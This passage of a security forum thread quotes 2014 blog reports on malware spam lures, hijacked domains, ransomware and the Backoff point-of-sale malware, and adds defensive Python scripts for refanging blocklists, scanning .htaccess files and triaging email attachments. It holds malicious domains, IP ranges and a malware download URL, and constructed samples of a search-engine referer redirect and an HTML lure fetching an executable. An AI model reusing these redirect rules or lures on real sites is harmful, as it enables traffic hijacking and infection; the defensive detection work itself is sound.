    Current Virus total detections: 5/54* . This skipped invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper word.doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/1...is/1406569801/

    178.63.240.112: https://www.virustotal.com/en/ip-add...2/information/
    ___

    Fake Amazon order SPAM
    - http://blog.dynamoo.com/2014/07/amaz...rder-spam.html
    28 July 2014 - "This fake Amazon spam comes with a malicious attachment:
    Screenshot: https://2.bp.blogspot.com/-JqukbICRl...600/amazon.png

    Attached is a file Order-239-1744919-1697181.zip which in turn contains a malicious executable Order details 001-8821901-992107.exe which has a VirusTotal detection rate of 18/54*. The Comodo CAMAS analysis** shows that the malware reaches out to a familiar set of URLs*** to download further components... recommend blocking the following domains:
    zag .com.ua
    daisyblue .ru
    ricebox .biz
    brandsalted .com
    fbcashmethod .ru
    expositoresrollup .es
    madrasahhusainiyahkl .com
    sexyfoxy .ts6.ru
    huework .com
    siliconharbourng .com
    martijnvanhout .nl
    "
    * https://www.virustotal.com/en-gb/fil...is/1406572004/

    ** http://camas.comodo.com/cgi-bin/subm...753809cbbc5ac2

    *** http://blog.dynamoo.com/2014/07/tiff...july-spam.html

    Last edited by AplusWebMaster; 2014-07-28 at 23:34.
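The "Recommended blocklist" sections quoted in the two posts above (#486 and #487) mix CIDR ranges with domains written defanged ("ddob .us", "walex2.ddob .us"), so they cannot be dropped into a proxy or resolver as-is. The script below is an added example, not code from the dynamoo posts: it refangs that notation, splits the list into networks and domains, and checks an observed IP, hostname or URL against it (subdomains of a listed domain match, IPs match by CIDR containment). The sample list is built from the entries quoted above; the indicators fed to is_blocked() are constructed, and the ipset/RPZ output format in render_rules() is an assumption about how you would deploy it.

```python
import ipaddress
import re

# Built from the blocklist entries quoted in the posts above; the defanged
# spelling ('ddob .us') is the posts' own convention, not an extra indicator.
SAMPLE_BLOCKLIST = """
Recommended blocklist:
198.27.110.192/26
xiga .us
ddob .us
88.198.252.168/29
fernandocoelho .net.br
duk66 .com
"""


def refang(s):
    """Undo the defanging used in these posts ('ddob .us', 'http ://', 'hxxp://', 'a[.]b')."""
    s = s.strip().strip('"').strip()
    s = re.sub(r"\s+\.", ".", s)                                   # 'ddob .us'  -> 'ddob.us'
    s = s.replace("[.]", ".")                                       # 'ddob[.]us' -> 'ddob.us'
    s = re.sub(r"^hxxp(s?)\s*://", r"http\1://", s, flags=re.I)     # 'hxxp://'   -> 'http://'
    s = re.sub(r"^http(s?)\s+://", r"http\1://", s, flags=re.I)     # 'http ://'  -> 'http://'
    return s


def host_of(indicator):
    """Host part of a refanged IP, hostname, host:port or URL (IPv4 and hostnames only)."""
    ind = re.sub(r"^[a-z]+://", "", refang(indicator), flags=re.I)
    return ind.split("/")[0].split(":")[0].lower().rstrip(".")


def parse_blocklist(text):
    """Split a pasted blocklist into (ip_networks, domains)."""
    nets, domains = [], set()
    for line in text.splitlines():
        line = refang(line)
        if not line or line.startswith("#") or line.endswith(":"):
            continue  # blank, comment, or the 'Recommended blocklist:' heading
        try:
            nets.append(ipaddress.ip_network(line, strict=False))  # '1.2.3.4' becomes a /32
            continue
        except ValueError:
            pass
        host = host_of(line)
        if re.fullmatch(r"[a-z0-9.-]+", host) and "." in host:
            domains.add(host)
    return nets, domains


def is_blocked(indicator, nets, domains):
    """True if an IP falls in a listed range, or a hostname is a listed domain or a subdomain of one."""
    host = host_of(indicator)
    try:
        ip = ipaddress.ip_address(host)
        return any(ip in net for net in nets)
    except ValueError:
        pass
    labels = host.split(".")
    # walk up the name: 'walex2.ddob.us' -> 'ddob.us' matches the listed domain
    return any(".".join(labels[i:]) in domains for i in range(len(labels) - 1))


def render_rules(nets, domains):
    """Deployment lines: an ipset for the ranges, an RPZ fragment for the domains
    (assumed deployment format; the set name 'dynamoo-block' is invented here)."""
    lines = ["create dynamoo-block hash:net"]
    lines += [f"add dynamoo-block {net}" for net in nets]
    for d in sorted(domains):
        lines += [f"{d} CNAME .", f"*.{d} CNAME ."]
    return lines


if __name__ == "__main__":
    nets, domains = parse_blocklist(SAMPLE_BLOCKLIST)
    for ind in ("198.27.110.200", "walex2.ddob .us/sddob/gate.php", "198.27.110.100"):
        print(ind, "->", "BLOCK" if is_blocked(ind, nets, domains) else "allow")
    print("\n".join(render_rules(nets, domains)))
```

The subdomain walk matters for the afraid.org-style hijacks in the post above: the listed entry is the parent domain, and the landing pages live on subdomains that were not known when the list was written.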

  8. #488 AplusWebMaster (Adviser Team)

    Something evil on 31.210.96.155, ...156, ...157 and ...158

    FYI...

    Something evil on 31.210.96.155, ...156, ...157 and ...158 (31.210.96.152/29)
    - http://blog.dynamoo.com/2014/07/some...121096156.html
    29 July 2014 - "I don't know quite what the exploit kit of the month is here, but the IP addresses 31.210.96.155, 31.210.96.156, 31.210.96.157 and 31.210.96.158 are currently serving up malware using -hijacked- GoDaddy domains, and are targeting victim websites by altering their .htaccess files** to intercept traffic coming from search engines such as Google. These IP addresses have been used for malware for some time*... VirusTotal reports for these IPs are pretty poor [1] [2] [3] [4]. I assume that they form part of an allocation 31.210.96.152/29, and I would very strongly recommend blocking that range... these appear to be subdomains of -hijacked- GoDaddy domains... I would recommend permablocking the following IP range and temporarily blocking the following domains:
    31.210.96.152/29 ..."
    (Long list at the dynamoo URL above.)
    * http://c-apt-ure.blogspot.co.uk/2014...ars-later.html

    ** http://www.symantec.com/connect/blog...ss-redirection

    1] 31.210.96.155: https://www.virustotal.com/en-gb/ip-...5/information/
    2] 31.210.96.156: https://www.virustotal.com/en-gb/ip-...6/information/
    3] 31.210.96.157: https://www.virustotal.com/en-gb/ip-...7/information/
    4] 31.210.96.158: https://www.virustotal.com/en-gb/ip-...8/information/

    Last edited by AplusWebMaster; 2014-07-29 at 19:52.
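The .htaccess trick mentioned in the post above (rewrite rules that only fire when the visitor arrived from a search engine, so the site owner browsing directly never sees the redirect) has a recognisable shape: one or more RewriteCond lines on %{HTTP_REFERER} naming a search engine, followed by a RewriteRule whose target is an absolute URL on another host. The scanner below is an added example, not code from the dynamoo post or the Symantec write-up it links: the .htaccess text is constructed for the example (bad.example.invalid is a placeholder, not a real indicator), and the list of hostnames the site legitimately owns is an assumed input. It also flags ErrorDocument directives pointing off-site, a second common place to hide a redirect.

```python
import re
from urllib.parse import urlparse

# Constructed sample (not from a real compromised site). The first block bounces only
# visitors who arrived from a search engine; the rest is what a normal CMS ships with.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [NC]
RewriteRule ^(.*)$ http://bad.example.invalid/in.php?q=$1 [R=302,L]
# legitimate front-controller rules
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
ErrorDocument 404 http://bad.example.invalid/404.php
"""

SEARCH_ENGINES = ("google", "bing", "yahoo", "yandex", "baidu", "duckduckgo", "aol", "ask")


def is_external(target, own_hosts):
    """True if target is an absolute http(s) URL on a host we do not own."""
    u = urlparse(target)
    return (u.scheme in ("http", "https") and u.hostname is not None
            and u.hostname.lower() not in own_hosts)


def engines_in(cond):
    """Search-engine names appearing as whole words in a RewriteCond pattern."""
    low = cond.lower()
    return [e for e in SEARCH_ENGINES if re.search(r"(?<![a-z])" + e + r"(?![a-z])", low)]


def scan_htaccess(text, own_hosts):
    """Return findings for referer-conditioned off-site redirects and off-site ErrorDocuments.

    Apache applies the RewriteCond lines immediately preceding a RewriteRule to that rule
    only, so conditions are accumulated until the next RewriteRule and then reset.
    Directives are split on whitespace; quoted patterns containing spaces are not handled.
    """
    own = {h.lower() for h in own_hosts}
    findings, pending = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        directive = tokens[0].lower()
        if directive == "rewritecond":
            pending.append(line)
        elif directive == "rewriterule":
            conds, pending = pending, []
            target = tokens[2] if len(tokens) > 2 else ""
            engines = sorted({e for c in conds if "%{HTTP_REFERER}" in c.upper()
                              for e in engines_in(c)})
            if engines and is_external(target, own):
                findings.append({"line": lineno, "type": "referer-redirect",
                                 "target": target, "engines": engines})
        elif directive == "errordocument" and len(tokens) > 2:
            if is_external(tokens[2], own):
                findings.append({"line": lineno, "type": "external-errordocument",
                                 "target": tokens[2]})
    return findings


if __name__ == "__main__":
    for f in scan_htaccess(SAMPLE_HTACCESS, {"www.example.invalid", "example.invalid"}):
        print(f)
```

Run it over every .htaccess under the web root (the injected one is often in a subdirectory rather than the document root), and treat any referer-conditioned redirect to a host you do not own as a compromise until proven otherwise, since there is no legitimate reason to treat Google's visitors differently from everyone else.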

  9. #489 AplusWebMaster (Adviser Team)

    Fake documents, Fake Amazon SPAM ...

    FYI...

    Fake 'documents ready for download' SPAM – PDF malware
    - http://myonlinesecurity.co.uk/docume...e-pdf-malware/
    30 July 2014 - "Your documents are ready for download is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
    Your documents 6419165973846 are ready , please sign them and email them back.
    Thank you
    John Garret
    Level III Account Management
    817-768-8742 office
    817-874-8795 cell
    johngarret@ natwest .com
    Investments in securities and insurance products are:
    NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
    The security of personal information about you is our priority. We protect this information by maintaining physical, electronic, and procedural safeguards that meet applicable law. We train our employees in the proper handling of personal information. When we use other companies to provide services for us, we require them to protect the confidentiality of personal information they receive...


    30 July 2014: Documents_3922929617733.rar (10 kb) : Extracts to Documents.scr
    Current Virus total detections: 2/53* . This Your documents are ready for download is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en-gb/fil...is/1406710734/
    ___

    Fake "Amazon order" SPAM
    - http://blog.dynamoo.com/2014/07/amaz...r-spam_30.html
    30 July 2014 - "Another -fake- Amazon spam with a malicious payload:

    Screenshot: https://4.bp.blogspot.com/-zOkh76LGg...00/amazon4.png

    There's a ZIP file attached (in this case Order-853-9908013-4362599.zip) which unzips to a folder Order details with a malicious file ORDER-992-5188991-000933.exe which has a VirusTotal detection rate of 9/53*. The Comodo CAMAS report** shows that it downloads a further component...
    This second executable has a VT detection rate of 5/54***..."
    (Long recommended blocklist at the dynamoo URL above.)
    * https://www.virustotal.com/en-gb/fil...is/1406729013/

    ** http://camas.comodo.com/cgi-bin/subm...35633ec2b7f226

    *** https://www.virustotal.com/en-gb/fil...is/1406729311/
    ___

    Fake Order status 30.07.2014.xls – XLS malware
    - http://myonlinesecurity.co.uk/order-...e-xls-malware/
    30 July 2014 - "Order status -540130 30.07.2014.xls is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... An email received coming from a -random- name with -no- company details and a totally blank body and a subject of Order status -540130 30.07.2014.xls ( different order numbers ) with a zip attachment
    30 July 2014 : 540130-30.07.2014.zip ( 47 kb) : Extracts to order-8301138-30.07.2014.xls.exe
    Current Virus total detections: 9/54* . This Order status -540130 30.07.2014.xls is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper Excel spreadsheet file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/c...is/1406736903/
    ___

    Fake "Payslip" SPAM
    - http://blog.dynamoo.com/2014/07/payslip-spam.html
    30 July 2014 - "... terseness works with this kind of message:
    From: Richard Mason [richardm254@ gmail .com]
    Date: 30 July 2014 21:23
    Subject: Payslip
    Please find attached the payment slip.
    Attached is a file swift copy-Payment-Slip-$70,000.html which when it is opened up in your browser comes up with a popup box.

    > https://3.bp.blogspot.com/-G4xRic3PZ...I/s1600/js.png

    Clicking OK downloads an executable from www.greenexpress .ge/swift//payslip.exe which you are presumably meant to run. It's a bit of an odd way to do it, so perhaps there's a reason. The HTML is simple enough..
    > https://3.bp.blogspot.com/-TfUbI6lM0.../s1600/js2.png
    ..but why bother doing it this way at all? Well, it makes it just a bit harder for email security software to find the link because the attachment is Base 64 encoded... The malware itself has a VirusTotal detection rate of 31/53*... Automated analysis tools seem to time out or crash, which indicates that the malware is hardened against analysis, but the VT report does see traffic with a pattern that might be blockable if you have a webfilter..."
    * https://www.virustotal.com/en-gb/fil...is/1406754444/

    198.50.169.4: https://www.virustotal.com/en-gb/ip-...4/information/
    ___

    New Crypto-Ransomware in the wild
    - http://blog.trendmicro.com/trendlabs...e-in-the-wild/
    July 30, 2014 - "... new crypto-ransomware variants that use new methods of encryption and evasion... 'Cryptoblocker' will not drop any text files instructing the victim on how to decrypt the files. Rather, it displays the dialog box below. Entering a transaction ID in the text box will trigger a message stating that the “transaction was sent and will be verified soon.”:
    > http://blog.trendmicro.com/trendlabs...7/cryptob1.jpg
    ... This malware does not use CryptoAPIs, a marked difference from other ransomware. CryptoAPIs are used to make RSA keys, which were not used with this particular malware. This is an interesting detail considering RSA keys would make decrypting files more difficult. Instead, we found that the advanced encryption standard (AES) is found in the malware code. A closer look also reveals that the compiler notes were still intact upon unpacking the code... Based on feedback from the Trend Micro Smart Protection Network, the US is the top affected country, followed by France and Japan. Spain and Italy round out the top five affected countries.
    Countries affected by Cryptoblocker:
    > http://blog.trendmicro.com/trendlabs...fection-01.jpg
    ... These ransomware variants prove that despite significant takedowns, cybercriminals will continue to find ways to victimize users. Users should remain cautious when dealing with unfamiliar files, emails, or URL links. While it might be tempting to pay the ransom for encrypted files, there is no guarantee that the cybercriminals will decrypt the ransomed files..."

    Last edited by AplusWebMaster; 2014-07-31 at 03:49.
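Two lure styles recur through the posts above: the "spoofed icon" attachments (#485, #486, #487 and #489, names like billing_form91_4352-2105.pdf.scr, bill.2563034.PDF____________.exe and invoice_28.07.doc.exe inside a ZIP) and the "Payslip" HTML attachment whose download link is invisible to a scanner that does not undo the Base64 transfer encoding. The script below is an added example, not code from any of the quoted blogs: it walks a raw message with the standard library, decodes each attachment, lists ZIP members and flags double extensions and space/underscore padding before the real extension, and pulls links to executables out of decoded HTML. The message it builds is constructed (example.invalid placeholders, dummy "MZ" bytes, invented sender); the extension lists are a reasonable starting set, not a standard.

```python
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Extensions Windows executes on double-click, and the document types lures imitate.
EXEC_EXT = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs", "vbe", "wsf", "hta", "msi"}
DOC_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "txt", "jpg", "png", "html"}
EXE_URL_RE = re.compile(r"https?://[^\s'\"<>]+?\.(?:exe|scr|pif|bat|msi)\b", re.I)


def check_name(name):
    """Reasons a file name looks like an executable dressed up as a document."""
    reasons = []
    base = name.rsplit("/", 1)[-1]
    parts = base.lower().split(".")
    if len(parts) < 2:
        return reasons
    ext = parts[-1]
    if ext in EXEC_EXT:
        reasons.append("executable extension ." + ext)
        # 'bill.2563034.PDF____________.exe': strip the padding and the inner extension shows
        inner = [p.rstrip("_ ") for p in parts[1:-1]]
        if any(p in DOC_EXT for p in inner):
            reasons.append("double extension (document extension before the real one)")
    if re.search(r"[ _]{5,}\.[^.]+$", base):
        reasons.append("padding before final extension")
    return reasons


def triage_message(raw):
    """Walk a raw RFC 822 message and return {attachment name: [findings]}.

    get_payload(decode=True) undoes the Base64 transfer encoding, so a link that is
    invisible in the raw message bytes (the 'Payslip' trick above) is visible here.
    """
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = {}
    for part in msg.iter_attachments():
        fname = part.get_filename() or "<unnamed>"
        data = part.get_payload(decode=True) or b""
        hits = check_name(fname)
        if zipfile.is_zipfile(io.BytesIO(data)):
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for member in zf.namelist():
                    hits += [f"{member}: {r}" for r in check_name(member)]
        else:
            text = data.decode("utf-8", "replace")
            hits += [f"link to executable: {u}" for u in EXE_URL_RE.findall(text)]
        findings[fname] = hits
    return findings


def build_sample():
    """Constructed message (not a real capture) carrying both lure styles seen above."""
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w") as zf:
        zf.writestr("bill.2563034.PDF____________.exe", b"MZ not really")
        zf.writestr("invoice copy/invoice copy.exe", b"MZ not really")
        zf.writestr("readme.txt", b"harmless")
    html = ('<html><body><script>alert("Please wait...");'
            'window.location="http://example.invalid/swift/payslip.exe";'
            '</script></body></html>')
    msg = EmailMessage()
    msg["From"] = "J.Parker <sender@example.invalid>"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Payslip"
    msg.set_content("Please find attached the payment slip.")
    msg.add_attachment(zbuf.getvalue(), maintype="application", subtype="zip",
                       filename="bill.2563034.zip")
    msg.add_attachment(html.encode(), maintype="text", subtype="html",
                       filename="swift copy-Payment-Slip.html", cte="base64")
    return msg.as_bytes()


if __name__ == "__main__":
    raw = build_sample()
    print("URL visible in raw message bytes:", b"payslip.exe" in raw)
    for name, hits in triage_message(raw).items():
        print(name, "->", hits or ["nothing flagged"])
```

Note that check_name() runs on the names inside the archive, not just on the attachment name: the ZIPs in these runs are innocuous by name (bill.2563034.zip), and the disguise is only visible one level down. A gateway that only inspects the outer filename, or that grep's the raw message for ".exe", misses both tricks.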

  10. #490 AplusWebMaster (Adviser Team)

    Backoff... Malware

    FYI...

    Backoff... Malware
    Backoff Point-of-Sale Malware
    - https://www.us-cert.gov/ncas/alerts/TA14-212A
    July 31, 2014 - "... malicious actors are using publicly available tools to locate businesses that use remote desktop applications. Remote desktop solutions like Microsoft's Remote Desktop [1] Apple Remote Desktop,[2] Chrome Remote Desktop,[3] Splashtop 2,[4] Pulseway[5], and LogMeIn Join.Me[6] offer the convenience and efficiency of connecting to a computer from a remote location. Once these applications are located, the suspects attempted to brute force the login feature of the remote desktop solution. After gaining access to what was often administrator or privileged access accounts, the suspects were then able to deploy the point-of-sale (PoS) malware and subsequently exfiltrate consumer payment data via an encrypted POST request. USSS, NCCIC/US-CERT and Trustwave Spiderlabs have been working together to characterize newly identified malware dubbed "Backoff", associated with several PoS data breach investigations. At the time of discovery and analysis, the malware variants had low to -zero- percent anti-virus detection rates, which means that fully updated anti-virus engines on fully patched computers could -not- identify the malware as -malicious- ..."
    Description: “Backoff” is a family of PoS malware and has been discovered recently. The malware family has been witnessed on at least three separate forensic investigations. Researchers have identified three primary variants to the “Backoff” malware including 1.4, 1.55 (“backoff”, “goo”, “MAY”, “net”), and 1.56 (“LAST”). These variations have been seen as far back as October 2013 and continue to operate as of July 2014. In total, the malware typically consists of the following four capabilities. An exception is the earliest witnessed variant (1.4) which does not include keylogging functionality. Additionally, 1.55 ‘net’ removed the explorer.exe injection component:
    - Scraping memory for track data
    - Logging keystrokes
    - Command & control (C2) communication
    - Injecting -malicious- stub into explorer.exe
    The malicious stub that is -injected- into explorer.exe is responsible for persistence in the event the malicious executable crashes or is forcefully stopped. The malware is responsible for scraping memory from running processes on the victim machine and searching for track data. Keylogging functionality is also present in most recent variants of “Backoff”. Additionally, the malware has a C2 component that is responsible for uploading discovered data, updating the malware, downloading/executing further malware, and uninstalling the malware.
    Impact: The impact of a compromised PoS system can affect both the businesses and consumer by exposing customer data such as names, mailing addresses, credit/debit card numbers, phone numbers, and e-mail addresses to criminal elements. These breaches can impact a business’ brand and reputation, while consumers’ information can be used to make fraudulent purchases or risk compromise of bank accounts. It is critical to safeguard your corporate networks and web servers to prevent any unnecessary exposure to compromise or to mitigate any damage that could be occurring now.
    Solution: At the time this advisory is released, the variants of the “Backoff” malware family are largely -undetected- by anti-virus (AV) vendors. However, shortly following the publication of this technical analysis, AV companies will quickly begin detecting the existing variants. It’s important to maintain up-to-date AV signatures and engines as new threats such as this are continually being added to your AV solution...
    (More detail at the us-cert URL above.)
    ___

    - http://blog.trendmicro.com/trendlabs...ff-targets-us/
    Aug 6, 2014
    Heat map of malicious communications found in affected US states
    > http://blog.trendmicro.com/trendlabs.../heatmap31.jpg

    - http://atlas.arbor.net/briefs/index#1443301999
    High Severity
    7 Aug 2014

    Last edited by AplusWebMaster; 2014-08-08 at 22:13.
